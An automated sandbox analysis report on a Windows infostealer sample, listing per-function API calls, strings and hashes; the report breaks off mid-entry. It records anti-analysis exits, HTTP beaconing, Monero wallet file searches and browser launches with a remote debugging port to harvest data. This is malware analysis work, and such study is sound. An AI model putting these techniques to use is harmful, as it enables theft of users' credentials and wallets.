                                  • Instruction ID: 5cbe540e9148f8105f2386664be101bbe1040e25f8423359534334b6432e2027
                                  • Opcode Fuzzy Hash: 79dbca01198334dbe7bf2fe6308504a16dc8b44b47b90d63cae71e687e1175ef
                                  • Instruction Fuzzy Hash: A501ADB0E40308FAEF10DFE4CC4ABAEBB7CBB08701F608048E704BA2C1D6B859419759
                                  Function 007F6D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1450 7f6d93 1451 7f6daa 1450->1451 1453 7f6dac-7f6dc2 call 7f6bc0 call 7f5d60 CloseHandle ExitProcess 1451->1453 1454 7f6d5a-7f6d77 call 7fade0 OpenEventA 1451->1454 1459 7f6d79-7f6d91 call 7fade0 CreateEventA 1454->1459 1460 7f6d95-7f6da4 CloseHandle Sleep 1454->1460 1459->1453 1460->1451
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01458960,?,008010F4,?,00000000,?,008010F8,?,00000000,00800AF3), ref: 007F6D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007F6D88
                                  • CloseHandle.KERNEL32(00000000), ref: 007F6D99
                                  • Sleep.KERNEL32(00001770), ref: 007F6DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,01458960,?,008010F4,?,00000000,?,008010F8,?,00000000,00800AF3), ref: 007F6DBA
                                  • ExitProcess.KERNEL32 ref: 007F6DC2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: b529c1368b93f18b46cca2b6f7dc40b4fa6814eb8c740dac8d0ad37ac84f0b28
                                  • Instruction ID: 32922ad51418f1a8b1025fe794bb8012b8f5923559f5d669041df33d21fee145
                                  • Opcode Fuzzy Hash: b529c1368b93f18b46cca2b6f7dc40b4fa6814eb8c740dac8d0ad37ac84f0b28
                                  • Instruction Fuzzy Hash: 30F05E70B4820DEBEF04EBE0DC4ABBD3774AF14741F100615B712A53A6CBF89501CA62
                                  Function 007E4800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4889
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4899
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: 8ece92597587a347442d0e885c6fcca12452287c835663671880c7d08a0cb987
                                  • Instruction ID: 9916a61c09292498e2514463bfb55cf0a0db8d97b0d0a6b5efbf182386078979
                                  • Opcode Fuzzy Hash: 8ece92597587a347442d0e885c6fcca12452287c835663671880c7d08a0cb987
                                  • Instruction Fuzzy Hash: 742142B1D00209ABDF14DFA5EC4AADD7B75FB44320F108625F515A72D1DB706609CF91
                                  Function 007F5440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007E62D0: InternetOpenA.WININET(00800DFF,00000001,00000000,00000000,00000000), ref: 007E6331
                                    • Part of subcall function 007E62D0: StrCmpCA.SHLWAPI(?,0145E350), ref: 007E6353
                                    • Part of subcall function 007E62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E6385
                                    • Part of subcall function 007E62D0: HttpOpenRequestA.WININET(00000000,GET,?,0145DB00,00000000,00000000,00400100,00000000), ref: 007E63D5
                                    • Part of subcall function 007E62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007E640F
                                    • Part of subcall function 007E62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E6421
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007F5478
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: 56a4def052a26ee2c04c01ad1a1d5d9aebce19ece198447591083242c0f0458e
                                  • Instruction ID: 55ffd09047a71ce3dc5e00528248dca360889e1da28f5e6cbe3c8f045dd19b40
                                  • Opcode Fuzzy Hash: 56a4def052a26ee2c04c01ad1a1d5d9aebce19ece198447591083242c0f0458e
                                  • Instruction Fuzzy Hash: 8011EFB0A0014CEACB14FFA4DD9AAFD7329AF54350F404558FA1E57692EB38AB18C651
                                  Function 007F7A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F7AA0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F7AA7
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 007F7ABF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: 1d4af46ae375f289e994e2f3acac4e361c039923d217851a926dfdc7a481a1a0
                                  • Instruction ID: 678072b09e49ce7e0d659cb67f8356bec2df3a5a11ed8eb4826f4e7cfc000b56
                                  • Opcode Fuzzy Hash: 1d4af46ae375f289e994e2f3acac4e361c039923d217851a926dfdc7a481a1a0
                                  • Instruction Fuzzy Hash: 6D0162B1A08249ABC714CF98DD45BAEBBB8F744711F10021AF615E2390D7B45A00CBA1
                                  Function 007E1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007E112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 007E1132
                                  • ExitProcess.KERNEL32 ref: 007E1143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 10e0a211970cf82bd05078b5ed0134717af5a89705476f2d21ea83d5905e158f
                                  • Instruction ID: b2f2cb8350e43d36cdb70862f3867d771e53fc112da0a735e895437edaa06836
                                  • Opcode Fuzzy Hash: 10e0a211970cf82bd05078b5ed0134717af5a89705476f2d21ea83d5905e158f
                                  • Instruction Fuzzy Hash: 43E0CD7094930CFBE710DBD1DC0FB4C767C9B44B01F500254F7097A1E1C6F426404658
                                  Function 007E10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007E10B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 007E10F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: bd2d46efd3713d5fdf32a9784664ab2574d75b63317d5c8fe83171825a7c6d0d
                                  • Instruction ID: 03e1e17810f368b08f11f138aadf5bdf718bfe09fbcd407494f993dc42d39aef
                                  • Opcode Fuzzy Hash: bd2d46efd3713d5fdf32a9784664ab2574d75b63317d5c8fe83171825a7c6d0d
                                  • Instruction Fuzzy Hash: D1F0E2B1642208BBE7149AA8AC5AFAEB79CE709B04F300548F500E3291D5719E00CAA0
                                  Function 007E1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007F7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F7AA0
                                    • Part of subcall function 007F7A70: RtlAllocateHeap.NTDLL(00000000), ref: 007F7AA7
                                    • Part of subcall function 007F7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 007F7ABF
                                    • Part of subcall function 007F79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007E11B7), ref: 007F7A10
                                    • Part of subcall function 007F79E0: RtlAllocateHeap.NTDLL(00000000), ref: 007F7A17
                                    • Part of subcall function 007F79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 007F7A2F
                                  • ExitProcess.KERNEL32 ref: 007E11C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: d14d2f2e6616e93fc05f83c22e78d9ce62e922ce13605127ceff64df2bfd2b7f
                                  • Instruction ID: 64e1940aa71f55728aa9f1d589969cc65e5649574623c7da5ee2e2ffdb893114
                                  • Opcode Fuzzy Hash: d14d2f2e6616e93fc05f83c22e78d9ce62e922ce13605127ceff64df2bfd2b7f
                                  • Instruction Fuzzy Hash: A7E0ECB590820992CA14B3F57C0BB3A328C5B5530AF440514FA0496263EA7DE8128176

                                  Non-executed Functions

                                  Function 007EBE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00800B32,00800B2F,00000000,?,?,?,00801450,00800B2E), ref: 007EBEC5
                                  • StrCmpCA.SHLWAPI(?,00801454), ref: 007EBF33
                                  • StrCmpCA.SHLWAPI(?,00801458), ref: 007EBF49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007EC8A9
                                  • FindClose.KERNEL32(000000FF), ref: 007EC8BB
                                  Strings
                                  • Preferences, xrefs: 007EC104
                                  • \Brave\Preferences, xrefs: 007EC1C1
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 007EC534
                                  • Google Chrome, xrefs: 007EC6F8
                                  • Brave, xrefs: 007EC0E8
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 007EC495
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 007EC3B2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-1869280968
                                  • Opcode ID: 1d37261ae0c7f2951b8b26d9fc78c35d4d8119603ce10f485d3ad6ef623c132f
                                  • Instruction ID: f5d0a5ec570f5d9ff844aa03329c9ab357e60f64b2a3355cd41ed41f0d79aaf7
                                  • Opcode Fuzzy Hash: 1d37261ae0c7f2951b8b26d9fc78c35d4d8119603ce10f485d3ad6ef623c132f
                                  • Instruction Fuzzy Hash: EE5202B2610148EBCB14FB64DD9AEFE733DAF54300F404598B60AA6191EE385B49CF66
                                  Function 007F3B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 007F3B1C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 007F3B33
                                  • lstrcat.KERNEL32(?,?), ref: 007F3B85
                                  • StrCmpCA.SHLWAPI(?,00800F58), ref: 007F3B97
                                  • StrCmpCA.SHLWAPI(?,00800F5C), ref: 007F3BAD
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007F3EB7
                                  • FindClose.KERNEL32(000000FF), ref: 007F3ECC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: ea183089f946b29c16050c337732f758ed8d3eff73b4fa32b4412b2e9f0de415
                                  • Instruction ID: 5c55ebde450bf88047fc51894e5e972db2b69370bb23a7ecb8fc0859256573e2
